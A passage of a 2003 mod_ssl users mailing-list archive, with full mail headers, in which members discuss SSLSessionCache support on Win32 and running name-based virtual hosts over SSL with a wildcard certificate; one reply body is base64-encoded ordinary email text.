sufficiently widespread that you can count on it.

-Ekr

-- 
[Eric Rescorla                                   ekr@rtfm.com]
                http://www.rtfm.com/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 13 17:14:19 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 161172AA0B4; Mon, 13 Jan 2003 17:14:19 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from akamai.com (fw01.cmbrmaks.akamai.com [80.67.64.10])
	by master.modssl.org (Postfix) with ESMTP id 3DD7A2AA086
	for ; Mon, 13 Jan 2003 17:14:17 +0100 (CET)
Received: from akamai.com (vwall1.kendall.corp.akamai.com [172.17.4.33])
	by akamai.com (8.11.6+Sun/8.11.6) with ESMTP id h0DGEFW28900
	for ; Mon, 13 Jan 2003 11:14:15 -0500 (EST)
Received: from exgate.kendall.corp.akamai.com (exgate.kendall.corp.akamai.com [172.17.0.159])
	by akamai.com (8.11.6+Sun/8.11.6) with ESMTP id h0DGEEj02361
	for ; Mon, 13 Jan 2003 11:14:15 -0500 (EST)
Received: by exgate.kendall.corp.akamai.com with Internet Mail Service (5.5.2653.19)
	id ; Mon, 13 Jan 2003 11:09:21 -0500
Message-ID: <7DA8C3FEF20ED711907400B0D049A59D2871B3@kendall-ex4.kendall.corp.akamai.com>
From: "Wilkins, Craig" 
To: "'modssl-users@modssl.org'" 
Subject: SSLSessionCaching on Win32
Date: Mon, 13 Jan 2003 11:09:18 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Wilkins, Craig" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> 
> > I am having trouble getting the SSLSessionCache directive 
> > working on Win NT and have been unable to find any examples 
> > or information where others have been able to implement this.
> > 
> > Does anyone know if this directive is supported on Win32?
> > 
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 13 19:30:01 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2AE942AA0B4; Mon, 13 Jan 2003 19:30:01 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mta203-rme.xtra.co.nz (mta203-rme.xtra.co.nz [210.86.15.146])
	by master.modssl.org (Postfix) with ESMTP id 37F1A2AA086
	for ; Mon, 13 Jan 2003 19:29:58 +0100 (CET)
Received: from mta1-rme.xtra.co.nz ([210.86.15.140])
          by mta203-rme.xtra.co.nz with ESMTP
          id <20030113182954.FVZN1199.mta203-rme.xtra.co.nz@mta1-rme.xtra.co.nz>
          for ; Tue, 14 Jan 2003 07:29:54 +1300
Received: from xtra.co.nz ([210.86.54.166]) by mta1-rme.xtra.co.nz
          with ESMTP
          id <20030113182954.ESTG15912.mta1-rme.xtra.co.nz@xtra.co.nz>
          for ; Tue, 14 Jan 2003 07:29:54 +1300
Message-ID: <3E2305A1.3000904@xtra.co.nz>
Date: Tue, 14 Jan 2003 07:29:53 +1300
From: James Collier 
User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.1) Gecko/20021207
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Confession: I use NBVHs with SSL (was Re: 2 VirtualHosts with
 2 Certificates)
References: <484A6CA492BE654395D208B1D8D5393972F779@SOMEXEVS001.ex.ordersx.org>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: James Collier 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Many thanks Owen - I'll sleep more easily now ;)

Boyle Owen wrote:
>>-----Original Message-----
>>From: James Collier [mailto:james.collier@xtra.co.nz]
>>
>>At the moment, the handshake take place using the first matching vhost 
>>on the basis of IP+Port, but evidently Apache then scans the decrypted 
>>host header and assigns the correct NBVH. 
> 
> 
> Exactly. The SSL transaction is handled by mod_ssl. The apache core is only used initially to deliver a certificate to the SSL Engine. As you rightly say, given only an IP address and port number, it simply responds with the first cert it finds in a matching VH. Having obtained a cert, mod_ssl establishes the SSL channel with the browser - thereafter, the requests are decrypted and passed "en clair" to the apache core. So now apache can apply its NBVH algorithm happily. 
> 
> 
>>This is using 1.3.x; I haven't tested 2.x yet.
> 
> 
> It will be the same. This is a feature of the HTTPS layer and is unaffected by what happens in the apache core, which is under HTTPS.
> 
> 
>>My fear is that future apache+modssl code may lock-in the first NBVH 
>>that matches on the basis of IP+Port, which would break my scheme.
> 
> 
> Not likely. Each request is allowed to contain its own "Host" header. So there is no reason why the server should override it. In any case, there is no mechanism for the server to "remember" that subsequent requests from a particular client were originally served from a certain VH. HTTPS is an additional onion-layer which entirely encapsulates HTTP so there should be no spillover from one to the other.
> 
> Rgds,
> 
> Owen Boyle
> 
> 
>>  Regards,
>>     James.
>>
>>PS For those of you who were wondering, we use a private CA to 
>>issue the 
>>wildcard server cert.  As someone has already noted, Thawte advertise 
>>them as well.
>>
>>Boyle Owen wrote:
>>
>>>>-----Original Message-----
>>>>From: James Collier [mailto:james.collier@xtra.co.nz]
>>>>
>>>>I realise I am on thin ice as it would be a "reasonable" 
>>>>optimisation to assign the final virtual host at an earlier 
>>>>stage than is currently the case with SSL.
>>>
>>                                        ^^^
>>                            I meant "apache+modssl"
>>
>>>
>>>I wouldn't worry too much. Currently, in an SSL transaction, *all*
>>>information is regarded as requiring encryption - including the Host
>>>header in the original request. So the SSL session has to be 
>>
>>established
>>
>>>before any traffic takes place. Anything different (e.g. putting the
>>>host header in the SSL layer) would be a major revision of 
>>
>>the protocol.
>>
>>>One of two things will happen first:
>>>
>>>- IPv6 will take off, creating so many IP addresses that NBVH will be
>>>unnecessary and we will revert to one site, one IP.
>>>- A new SSL-like protocol will appear which promotes the site name to
>>>the SSL layer thus enabling NBVH.
>>>
>>>Either way, you'll need substantially to upgrade and reconfigure your
>>>server so you'll be well aware of the changes.
>>>
>>>Rgds,
>>>
>>>Owen Boyle
>>>
>>>This message is for the named person's use only. It may contain
>>>confidential, proprietary or legally privileged information. No
>>>confidentiality or privilege is waived or lost by any 
>>
>>mistransmission.
>>
>>>If you receive this message in error, please notify the 
>>
>>sender urgently
>>
>>>and then immediately delete the message and any copies of it 
>>
>>from your
> 
>>>system. Please also immediately destroy any hardcopies of 
>>
>>the message.
>>
>>>You must not, directly or indirectly, use, disclose, 
>>
>>distribute, print,
>>
>>>or copy any part of this message if you are not the intended 
>>
>>recipient.
>>
>>>The sender's company reserves the right to monitor all e-mail
>>>communications through their networks. Any views expressed in this
>>>message are those of the individual sender, except where the message
>>>states otherwise and the sender is authorised to state them to be the
>>>views of the sender's company. 
>>>
>>
>>______________________________________________________________________
>>
>>>Apache Interface to OpenSSL (mod_ssl)                   
>>
> www.modssl.org
> 
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
> 
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 13 22:19:35 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 86C922AA0B4; Mon, 13 Jan 2003 22:19:35 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mag05.bb.admin.ch (fwigk1.admin.ch [193.5.216.70])
	by master.modssl.org (Postfix) with ESMTP id CE38D2AA086
	for ; Mon, 13 Jan 2003 22:19:33 +0100 (CET)
Received: from mar02.bb.admin.ch (mar02.bb.admin.ch [193.5.222.72])
	by mag05.bb.admin.ch (8.11.2/8.11.2) with ESMTP id h0DLJS209221
	for ; Mon, 13 Jan 2003 22:19:28 +0100 (MET)
Received: from mas21.bb.admin.ch (mas21.bb.admin.ch [193.5.222.82])
	by mar02.bb.admin.ch (8.11.2/8.11.2) with SMTP id h0DLJSM17782
	for ; Mon, 13 Jan 2003 22:19:28 +0100 (MET)
Received: by ad01008exc.ad.admin.ch with Internet Mail Service (5.5.2653.19)
	id ; Mon, 13 Jan 2003 22:19:27 +0100
Message-ID: 
From: Michael.Straessle@bk.admin.ch
To: modssl-users@modssl.org
Subject: AW: SSLSessionCaching on Win32
Date: Mon, 13 Jan 2003 22:19:16 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Michael.Straessle@bk.admin.ch
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

...depends on your configuration. SSLSessionCache works fine with my =
apache
1.3.27, but I had some problems with apache 2. with 2.0.39, session =
cache
was not honoured on win32 (bugzilla 10170), but this may have changed =
in the
meantime.

rgds
michael

> -----Urspr=FCngliche Nachricht-----
> Von: Wilkins, Craig [mailto:cwilkins@akamai.com]
> Gesendet: Montag, 13. Januar 2003 17:09
> An: 'modssl-users@modssl.org'
> Betreff: SSLSessionCaching on Win32
>=20
>=20
> >=20
> > > I am having trouble getting the SSLSessionCache directive=20
> > > working on Win NT and have been unable to find any examples=20
> > > or information where others have been able to implement this.
> > >=20
> > > Does anyone know if this directive is supported on Win32?
> > >=20
> >=20
> =
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   =
www.modssl.org
> User Support Mailing List                      =
modssl-users@modssl.org
> Automated List Manager                            =
majordomo@modssl.org
>=20
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan 14 05:15:29 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id F390F2AA08A; Tue, 14 Jan 2003 05:15:28 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mail1.rdcss.com (dsl-66-112-64-104.spt.customer.centurytel.net [66.112.64.104])
	by master.modssl.org (Postfix) with ESMTP id 60FF02AA085
	for ; Tue, 14 Jan 2003 05:15:25 +0100 (CET)
Received: from me (unknown [192.168.0.5])
	by mail1.rdcss.com (Postfix) with ESMTP id 3D0651B932
	for ; Tue, 14 Jan 2003 04:15:19 +0000 (UTC)
Message-ID: <002c01c2bb83$70bc6560$0500a8c0@rdcss.com>
From: 
To: 
References: <484A6CA492BE654395D208B1D8D5393972F779@SOMEXEVS001.ex.ordersx.org> <3E2305A1.3000904@xtra.co.nz>
Subject: Re: Confession: I use NBVHs with SSL (was Re: 2 VirtualHosts with 2 Certificates)
Date: Mon, 13 Jan 2003 22:14:32 -0600
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: base64
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

QXJlIHRoZXJlIGFueSBkb2NzIGZvciBzZXR0aW5nIHRoaXMgdXA/DQoNCnRoYW5rcw0KUm9iZXJ0
DQotLS0tLSBPcmlnaW5hbCBNZXNzYWdlIC0tLS0tIA0KRnJvbTogIkphbWVzIENvbGxpZXIiIDxq
YW1lcy5jb2xsaWVyQHh0cmEuY28ubno+DQpUbzogPG1vZHNzbC11c2Vyc0Btb2Rzc2wub3JnPg0K
U2VudDogTW9uZGF5LCBKYW51YXJ5IDEzLCAyMDAzIDEyOjI5IFBNDQpTdWJqZWN0OiBSZTogQ29u
ZmVzc2lvbjogSSB1c2UgTkJWSHMgd2l0aCBTU0wgKHdhcyBSZTogMiBWaXJ0dWFsSG9zdHMgd2l0
aCAyIENlcnRpZmljYXRlcykNCg0KDQo+IE1hbnkgdGhhbmtzIE93ZW4gLSBJJ2xsIHNsZWVwIG1v
cmUgZWFzaWx5IG5vdyA7KQ0KPiANCj4gQm95bGUgT3dlbiB3cm90ZToNCj4gPj4tLS0tLU9yaWdp
bmFsIE1lc3NhZ2UtLS0tLQ0KPiA+PkZyb206IEphbWVzIENvbGxpZXIgW21haWx0bzpqYW1lcy5j
b2xsaWVyQHh0cmEuY28ubnpdDQo+ID4+DQo+ID4+QXQgdGhlIG1vbWVudCwgdGhlIGhhbmRzaGFr
ZSB0YWtlIHBsYWNlIHVzaW5nIHRoZSBmaXJzdCBtYXRjaGluZyB2aG9zdCANCj4gPj5vbiB0aGUg
YmFzaXMgb2YgSVArUG9ydCwgYnV0IGV2aWRlbnRseSBBcGFjaGUgdGhlbiBzY2FucyB0aGUgZGVj
cnlwdGVkIA0KPiA+Pmhvc3QgaGVhZGVyIGFuZCBhc3NpZ25zIHRoZSBjb3JyZWN0IE5CVkguIA0K
PiA+IA0KPiA+IA0KPiA+IEV4YWN0bHkuIFRoZSBTU0wgdHJhbnNhY3Rpb24gaXMgaGFuZGxlZCBi
eSBtb2Rfc3NsLiBUaGUgYXBhY2hlIGNvcmUgaXMgb25seSB1c2VkIGluaXRpYWxseSB0byBkZWxp
dmVyIGEgY2VydGlmaWNhdGUgdG8gdGhlIFNTTCBFbmdpbmUuIEFzIHlvdSByaWdodGx5IHNheSwg
Z2l2ZW4gb25seSBhbiBJUCBhZGRyZXNzIGFuZCBwb3J0IG51bWJlciwgaXQgc2ltcGx5IHJlc3Bv
bmRzIHdpdGggdGhlIGZpcnN0IGNlcnQgaXQgZmluZHMgaW4gYSBtYXRjaGluZyBWSC4gSGF2aW5n
IG9idGFpbmVkIGEgY2VydCwgbW9kX3NzbCBlc3RhYmxpc2hlcyB0aGUgU1NMIGNoYW5uZWwgd2l0
aCB0aGUgYnJvd3NlciAtIHRoZXJlYWZ0ZXIsIHRoZSByZXF1ZXN0cyBhcmUgZGVjcnlwdGVkIGFu
ZCBwYXNzZWQgImVuIGNsYWlyIiB0byB0aGUgYXBhY2hlIGNvcmUuIFNvIG5vdyBhcGFjaGUgY2Fu
IGFwcGx5IGl0cyBOQlZIIGFsZ29yaXRobSBoYXBwaWx5LiANCj4gPiANCj4gPiANCj4gPj5UaGlz
IGlzIHVzaW5nIDEuMy54OyBJIGhhdmVuJ3QgdGVzdGVkIDIueCB5ZXQuDQo+ID4gDQo+ID4gDQo+
ID4gSXQgd2lsbCBiZSB0aGUgc2FtZS4gVGhpcyBpcyBhIGZlYXR1cmUgb2YgdGhlIEhUVFBTIGxh
eWVyIGFuZCBpcyB1bmFmZmVjdGVkIGJ5IHdoYXQgaGFwcGVucyBpbiB0aGUgYXBhY2hlIGNvcmUs
IHdoaWNoIGlzIHVuZGVyIEhUVFBTLg0KPiA+IA0KPiA+IA0KPiA+Pk15IGZlYXIgaXMgdGhhdCBm
dXR1cmUgYXBhY2hlK21vZHNzbCBjb2RlIG1heSBsb2NrLWluIHRoZSBmaXJzdCBOQlZIIA0KPiA+
PnRoYXQgbWF0Y2hlcyBvbiB0aGUgYmFzaXMgb2YgSVArUG9ydCwgd2hpY2ggd291bGQgYnJlYWsg
bXkgc2NoZW1lLg0KPiA+IA0KPiA+IA0KPiA+IE5vdCBsaWtlbHkuIEVhY2ggcmVxdWVzdCBpcyBh
bGxvd2VkIHRvIGNvbnRhaW4gaXRzIG93biAiSG9zdCIgaGVhZGVyLiBTbyB0aGVyZSBpcyBubyBy
ZWFzb24gd2h5IHRoZSBzZXJ2ZXIgc2hvdWxkIG92ZXJyaWRlIGl0LiBJbiBhbnkgY2FzZSwgdGhl
cmUgaXMgbm8gbWVjaGFuaXNtIGZvciB0aGUgc2VydmVyIHRvICJyZW1lbWJlciIgdGhhdCBzdWJz
ZXF1ZW50IHJlcXVlc3RzIGZyb20gYSBwYXJ0aWN1bGFyIGNsaWVudCB3ZXJlIG9yaWdpbmFsbHkg
c2VydmVkIGZyb20gYSBjZXJ0YWluIFZILiBIVFRQUyBpcyBhbiBhZGRpdGlvbmFsIG9uaW9uLWxh
eWVyIHdoaWNoIGVudGlyZWx5IGVuY2Fwc3VsYXRlcyBIVFRQIHNvIHRoZXJlIHNob3VsZCBiZSBu
byBzcGlsbG92ZXIgZnJvbSBvbmUgdG8gdGhlIG90aGVyLg0KPiA+IA0KPiA+IFJnZHMsDQo+ID4g
DQo+ID4gT3dlbiBCb3lsZQ0KPiA+IA0KPiA+IA0KPiA+PiAgUmVnYXJkcywNCj4gPj4gICAgIEph
bWVzLg0KPiA+Pg0KPiA+PlBTIEZvciB0aG9zZSBvZiB5b3Ugd2hvIHdlcmUgd29uZGVyaW5nLCB3
ZSB1c2UgYSBwcml2YXRlIENBIHRvIA0KPiA+Pmlzc3VlIHRoZSANCj4gPj53aWxkY2FyZCBzZXJ2
ZXIgY2VydC4gIEFzIHNvbWVvbmUgaGFzIGFscmVhZHkgbm90ZWQsIFRoYXd0ZSBhZHZlcnRpc2Ug
DQo+ID4+dGhlbSBhcyB3ZWxsLg0KPiA+Pg0KPiA+PkJveWxlIE93ZW4gd3JvdGU6DQo+ID4+DQo+
ID4+Pj4tLS0tLU9yaWdpbmFsIE1lc3NhZ2UtLS0tLQ0KPiA+Pj4+RnJvbTogSmFtZXMgQ29sbGll
ciBbbWFpbHRvOmphbWVzLmNvbGxpZXJAeHRyYS5jby5uel0NCj4gPj4+Pg0KPiA+Pj4+SSByZWFs
aXNlIEkgYW0gb24gdGhpbiBpY2UgYXMgaXQgd291bGQgYmUgYSAicmVhc29uYWJsZSIgDQo+ID4+
Pj5vcHRpbWlzYXRpb24gdG8gYXNzaWduIHRoZSBmaW5hbCB2aXJ0dWFsIGhvc3QgYXQgYW4gZWFy
bGllciANCj4gPj4+PnN0YWdlIHRoYW4gaXMgY3VycmVudGx5IHRoZSBjYXNlIHdpdGggU1NMLg0K
PiA+Pj4NCj4gPj4gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXl5eDQo+
ID4+ICAgICAgICAgICAgICAgICAgICAgICAgICAgIEkgbWVhbnQgImFwYWNoZSttb2Rzc2wiDQo+
ID4+DQo+ID4+Pg0KPiA+Pj5JIHdvdWxkbid0IHdvcnJ5IHRvbyBtdWNoLiBDdXJyZW50bHksIGlu
IGFuIFNTTCB0cmFuc2FjdGlvbiwgKmFsbCoNCj4gPj4+aW5mb3JtYXRpb24gaXMgcmVnYXJkZWQg
YXMgcmVxdWlyaW5nIGVuY3J5cHRpb24gLSBpbmNsdWRpbmcgdGhlIEhvc3QNCj4gPj4+aGVhZGVy
IGluIHRoZSBvcmlnaW5hbCByZXF1ZXN0LiBTbyB0aGUgU1NMIHNlc3Npb24gaGFzIHRvIGJlIA0K
PiA+Pg0KPiA+PmVzdGFibGlzaGVkDQo+ID4+DQo+ID4+PmJlZm9yZSBhbnkgdHJhZmZpYyB0YWtl
cyBwbGFjZS4gQW55dGhpbmcgZGlmZmVyZW50IChlLmcuIHB1dHRpbmcgdGhlDQo+ID4+Pmhvc3Qg
aGVhZGVyIGluIHRoZSBTU0wgbGF5ZXIpIHdvdWxkIGJlIGEgbWFqb3IgcmV2aXNpb24gb2YgDQo+
ID4+DQo+ID4+dGhlIHByb3RvY29sLg0KPiA+Pg0KPiA+Pj5PbmUgb2YgdHdvIHRoaW5ncyB3aWxs
IGhhcHBlbiBmaXJzdDoNCj4gPj4+DQo+ID4+Pi0gSVB2NiB3aWxsIHRha2Ugb2ZmLCBjcmVhdGlu
ZyBzbyBtYW55IElQIGFkZHJlc3NlcyB0aGF0IE5CVkggd2lsbCBiZQ0KPiA+Pj51bm5lY2Vzc2Fy
eSBhbmQgd2Ugd2lsbCByZXZlcnQgdG8gb25lIHNpdGUsIG9uZSBJUC4NCj4gPj4+LSBBIG5ldyBT
U0wtbGlrZSBwcm90b2NvbCB3aWxsIGFwcGVhciB3aGljaCBwcm9tb3RlcyB0aGUgc2l0ZSBuYW1l
IHRvDQo+ID4+PnRoZSBTU0wgbGF5ZXIgdGh1cyBlbmFibGluZyBOQlZILg0KPiA+Pj4NCj4gPj4+
RWl0aGVyIHdheSwgeW91J2xsIG5lZWQgc3Vic3RhbnRpYWxseSB0byB1cGdyYWRlIGFuZCByZWNv
bmZpZ3VyZSB5b3VyDQo+ID4+PnNlcnZlciBzbyB5b3UnbGwgYmUgd2VsbCBhd2FyZSBvZiB0aGUg
Y2hhbmdlcy4NCj4gPj4+DQo+ID4+PlJnZHMsDQo+ID4+Pg0KPiA+Pj5Pd2VuIEJveWxlDQo+ID4+
Pg0KPiA+Pj5UaGlzIG1lc3NhZ2UgaXMgZm9yIHRoZSBuYW1lZCBwZXJzb24ncyB1c2Ugb25seS4g
SXQgbWF5IGNvbnRhaW4NCj4gPj4+Y29uZmlkZW50aWFsLCBwcm9wcmlldGFyeSBvciBsZWdhbGx5
IHByaXZpbGVnZWQgaW5mb3JtYXRpb24uIE5vDQo+ID4+PmNvbmZpZGVudGlhbGl0eSBvciBwcml2
aWxlZ2UgaXMgd2FpdmVkIG9yIGxvc3QgYnkgYW55IA0KPiA+Pg0KPiA+Pm1pc3RyYW5zbWlzc2lv
bi4NCj4gPj4NCj4gPj4+SWYgeW91IHJlY2VpdmUgdGhpcyBtZXNzYWdlIGluIGVycm9yLCBwbGVh
c2Ugbm90aWZ5IHRoZSANCj4gPj4NCj4gPj5zZW5kZXIgdXJnZW50bHkNCj4gPj4NCj4gPj4+YW5k
IHRoZW4gaW1tZWRpYXRlbHkgZGVsZXRlIHRoZSBtZXNzYWdlIGFuZCBhbnkgY29waWVzIG9mIGl0
IA0KPiA+Pg0KPiA+PmZyb20geW91cg0KPiA+IA0KPiA+Pj5zeXN0ZW0uIFBsZWFzZSBhbHNvIGlt
bWVkaWF0ZWx5IGRlc3Ryb3kgYW55IGhhcmRjb3BpZXMgb2YgDQo+ID4+DQo+ID4+dGhlIG1lc3Nh
Z2UuDQo+ID4+DQo+ID4+PllvdSBtdXN0IG5vdCwgZGlyZWN0bHkgb3IgaW5kaXJlY3RseSwgdXNl
LCBkaXNjbG9zZSwgDQo+ID4+DQo+ID4+ZGlzdHJpYnV0ZSwgcHJpbnQsDQo+ID4+DQo+ID4+Pm9y
IGNvcHkgYW55IHBhcnQgb2YgdGhpcyBtZXNzYWdlIGlmIHlvdSBhcmUgbm90IHRoZSBpbnRlbmRl
ZCANCj4gPj4NCj4gPj5yZWNpcGllbnQuDQo+ID4+DQo+ID4+PlRoZSBzZW5kZXIncyBjb21wYW55
IHJlc2VydmVzIHRoZSByaWdodCB0byBtb25pdG9yIGFsbCBlLW1haWwNCj4gPj4+Y29tbXVuaWNh
dGlvbnMgdGhyb3VnaCB0aGVpciBuZXR3b3Jrcy4gQW55IHZpZXdzIGV4cHJlc3NlZCBpbiB0aGlz
DQo+ID4+Pm1lc3NhZ2UgYXJlIHRob3NlIG9mIHRoZSBpbmRpdmlkdWFsIHNlbmRlciwgZXhjZXB0
IHdoZXJlIHRoZSBtZXNzYWdlDQo+ID4+PnN0YXRlcyBvdGhlcndpc2UgYW5kIHRoZSBzZW5kZXIg
aXMgYXV0aG9yaXNlZCB0byBzdGF0ZSB0aGVtIHRvIGJlIHRoZQ0KPiA+Pj52aWV3cyBvZiB0aGUg
c2VuZGVyJ3MgY29tcGFueS4gDQo+ID4+Pg0KPiA+Pg0KPiA+Pl9fX19fX19fX19fX19fX19fX19f
X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX18NCj4gPj4N
Cj4gPj4+QXBhY2hlIEludGVyZmFjZSB0byBPcGVuU1NMIChtb2Rfc3NsKSAgICAgICAgICAgICAg
ICAgICANCj4gPj4NCj4gPiB3d3cubW9kc3NsLm9yZw0KPiA+IA0KPiA+PlVzZXIgU3VwcG9ydCBN
YWlsaW5nIExpc3QgICAgICAgICAgICAgICAgICAgICAgbW9kc3NsLXVzZXJzQG1vZHNzbC5vcmcN
Cj4gPj5BdXRvbWF0ZWQgTGlzdCBNYW5hZ2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1h
am9yZG9tb0Btb2Rzc2wub3JnDQo+ID4gDQo+ID4gDQo+ID4gDQo+ID4gX19fX19fX19fX19fX19f
X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fXw0K
PiA+IEFwYWNoZSBJbnRlcmZhY2UgdG8gT3BlblNTTCAobW9kX3NzbCkgICAgICAgICAgICAgICAg
ICAgd3d3Lm1vZHNzbC5vcmcNCj4gPiBVc2VyIFN1cHBvcnQgTWFpbGluZyBMaXN0ICAgICAgICAg
ICAgICAgICAgICAgIG1vZHNzbC11c2Vyc0Btb2Rzc2wub3JnDQo+ID4gQXV0b21hdGVkIExpc3Qg
TWFuYWdlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBtYWpvcmRvbW9AbW9kc3NsLm9yZw0K
PiA+IF9fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19f
X19fX19fX19fX19fX19fX18NCj4gPiBBcGFjaGUgSW50ZXJmYWNlIHRvIE9wZW5TU0wgKG1vZF9z
c2wpICAgICAgICAgICAgICAgICAgIHd3dy5tb2Rzc2wub3JnDQo+ID4gVXNlciBTdXBwb3J0IE1h
aWxpbmcgTGlzdCAgICAgICAgICAgICAgICAgICAgICBtb2Rzc2wtdXNlcnNAbW9kc3NsLm9yZw0K
PiA+IEF1dG9tYXRlZCBMaXN0IE1hbmFnZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgbWFq
b3Jkb21vQG1vZHNzbC5vcmcNCj4gDQo+IA0KPiBfX19fX19fX19fX19fX19fX19fX19fX19fX19f
X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fDQo+IEFwYWNoZSBJbnRl
cmZhY2UgdG8gT3BlblNTTCAobW9kX3NzbCkgICAgICAgICAgICAgICAgICAgd3d3Lm1vZHNzbC5v
cmcNCj4gVXNlciBTdXBwb3J0IE1haWxpbmcgTGlzdCAgICAgICAgICAgICAgICAgICAgICBtb2Rz
c2wtdXNlcnNAbW9kc3NsLm9yZw0KPiBBdXRvbWF0ZWQgTGlzdCBNYW5hZ2VyICAgICAgICAgICAg
ICAgICAgICAgICAgICAgIG1ham9yZG9tb0Btb2Rzc2wub3Jn

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan 14 11:07:04 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 102562AA08A; Tue, 14 Jan 2003 11:07:04 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mta203-rme.xtra.co.nz (mta203-rme.xtra.co.nz [210.86.15.146])
	by master.modssl.org (Postfix) with ESMTP id 399972AA085
	for ; Tue, 14 Jan 2003 11:07:01 +0100 (CET)
Received: from mta3-rme.xtra.co.nz ([210.86.15.141])
          by mta203-rme.xtra.co.nz with ESMTP
          id <20030114100657.KNPI1199.mta203-rme.xtra.co.nz@mta3-rme.xtra.co.nz>;
          Tue, 14 Jan 2003 23:06:57 +1300
Received: from xtra.co.nz ([210.86.54.166]) by mta3-rme.xtra.co.nz
          with ESMTP
          id <20030114100656.WYEM13460.mta3-rme.xtra.co.nz@xtra.co.nz>;
          Tue, 14 Jan 2003 23:06:56 +1300
Message-ID: <3E23E140.5020308@xtra.co.nz>
Date: Tue, 14 Jan 2003 23:06:56 +1300
From: James Collier 
User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.1) Gecko/20021207
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Confession: I use NBVHs with SSL (was Re: 2 VirtualHosts with
 2 Certificates)
References: <484A6CA492BE654395D208B1D8D5393972F779@SOMEXEVS001.ex.ordersx.org> <3E2305A1.3000904@xtra.co.nz> <002c01c2bb83$70bc6560$0500a8c0@rdcss.com>
Content-Type: text/plain; charset=windows-1252; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: James Collier 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

robert@rdcss.com wrote:
> Are there any docs for setting this up?
Not as such - I cooked the site up as a one-off, with the feeling that 
much of it came under the dirty hack classification (particularly as 
almost every mod-ssl document contains wording to the effect of "Don't 
ever ever ever under any circumstances try to use NBVHs with mod-ssl")

There's nothing particularly innovative or devious here - and I'm in the 
rare position of working with a smallish closed user group whose members 
